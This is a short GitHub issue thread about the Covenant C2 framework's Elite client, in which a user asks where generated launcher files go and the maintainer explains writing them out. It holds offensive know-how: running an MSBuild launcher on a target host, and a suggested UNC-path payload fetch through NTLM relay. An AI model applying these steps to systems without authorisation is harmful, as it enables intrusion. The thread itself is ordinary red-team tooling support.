### ISSUE TITLE
Where are generated files stored?

### ISSUE THREAD

**Issue by ThunderousDreamer** [cobbr/Elite#10]
Hi all,

I'm trying to figure out where the generated files are stored. For example I generated a MSBuild launcher, but now I'm not sure where to find these files.

```(Covenant: Launchers\MSBuild) > generate
[*] Generated MSBuildLauncher: msbuild.exe file.xml```

**Comment by cobbr** [comment]
@ThunderousDreamer You'll need to use the `write` command to write it out to a file

**Comment by ThunderousDreamer** [comment]
I see. So I `write output.xml` for the xml file, then move that xml file to the target host and run `msbuild.exe output.xml` 

Then I could hypothetically host the output.xml on a simpeHTTPServer locally and have msbuild.exe run that file like `msbuild.exe \\192.168.0.22\output.xml` through NTLMRelay or something, right?

Makes sense, thank you!

**Comment by cobbr** [comment]
I don't believe hosting on an HTTP server and accessing over a UNC path will work like you intend.

But you have the Covenant/Elite process correct: you generate the launcher, write it to a file, and then find a way to execute on the target system.
